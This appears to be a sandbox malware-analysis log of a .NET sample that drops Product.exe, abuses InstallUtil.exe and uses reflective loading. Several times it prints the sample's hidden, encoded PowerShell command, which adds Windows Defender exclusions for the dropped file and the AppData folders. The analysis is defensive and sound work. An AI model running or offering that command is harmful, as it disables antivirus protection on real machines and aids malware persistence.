Source: 0.2.test.exe.59d0000.14.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.test.exe.59d0000.14.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.test.exe.59d0000.14.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.test.exe.59d0000.14.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.test.exe.59d0000.14.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.evad.winEXE@10/13@1/1
Source: C:\Users\user\Desktop\test.exe File created: C:\Users\user\AppData\Local\MethodSignature
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\lnwza888
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jufotpl.4nx.ps1
Source: test.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\test.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\test.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\test.exe File read: C:\Users\user\Desktop\test.exe
Source: unknown Process created: C:\Users\user\Desktop\test.exe "C:\Users\user\Desktop\test.exe"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\test.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, wbemcomn.dll, sspicli.dll, taskschd.dll, xmllite.dll, sxs.dll, ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, wbemcomn.dll, sspicli.dll, taskschd.dll, sxs.dll, xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, wbemcomn.dll, sspicli.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, windows.storage.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: test.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: test.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdb source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: test.exe, test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdbx source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: test.exe, ParameterObject.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: test.exe, DefinitionBridge.cs.Net Code: SpecifyExternalDefinition System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.test.exe.5790000.13.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.test.exe.5790000.13.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.test.exe.4665468.9.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.test.exe.4665468.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.test.exe.59d0000.14.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: Yara matchFile source: 4.2.Product.exe.43c6b88.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Product.exe.3b16b88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.test.exe.5730000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.3c96b88.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.test.exe.42d6b88.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: test.exe PID: 2876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Product.exe PID: 5136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Product.exe PID: 6904, type: MEMORYSTR
                      Source: test.exeStatic PE information: 0xDFD6F372 [Sat Jan 1 08:23:14 2089 UTC]
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A9804 push es; ret 0_2_056A9807
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B0DF8 push 8B000001h; iretd 0_2_056B0DFD
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B162F pushfd ; retf 0_2_056B163D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056BC6D9 push eax; iretd 0_2_056BC6E5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B0EB2 push eax; retf 0_2_056B0EB3
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057FE963 push eax; iretd 0_2_057FE969
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F1900 push eax; retf 0_2_057F1901
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF88737D2A5 pushad ; iretd 2_2_00007FF88737D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8874900BD pushad ; iretd 2_2_00007FF8874900C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887563330 push eax; iretd 2_2_00007FF887563331
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887562316 push 8B485F91h; iretd 2_2_00007FF88756231B
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05879804 push es; ret 4_2_05879807
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05880DF8 push 8B000001h; iretd 4_2_05880DFD
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_05880EB2 push eax; retf 4_2_05880EB3
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_0588C6D9 push eax; iretd 4_2_0588C6E5
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C7774 pushad ; iretd 4_2_059C777D
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_059C1900 push eax; retf 4_2_059C1901
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051E9804 push es; ret 5_2_051E9807
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F0DF8 push 8B000001h; iretd 5_2_051F0DFD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051F0EB2 push eax; retf 5_2_051F0EB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_051FC6D9 push eax; iretd 5_2_051FC6E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05331900 push eax; retf 5_2_05331901
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05567E86 push es; ret 5_2_05567E87
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F0DF8 push 8B000001h; iretd 12_2_052F0DFD
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F162F pushfd ; retf 12_2_052F163D
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052F0EB2 push eax; retf 12_2_052F0EB3
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_052FC6D9 push eax; iretd 12_2_052FC6E5
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 12_2_05431900 push eax; retf 12_2_05431901
                      Source: test.exeStatic PE information: section name: .text entropy: 7.943479566691634
                      Source: Product.exe.0.drStatic PE information: section name: .text entropy: 7.943479566691634
                      Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
